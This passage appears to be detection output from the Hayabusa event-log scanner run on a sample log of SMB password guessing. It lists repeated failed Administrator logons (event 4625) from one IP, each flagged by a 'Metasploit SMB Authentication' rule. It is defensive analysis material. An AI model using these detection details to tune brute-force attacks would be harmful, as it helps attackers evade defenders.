SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: 
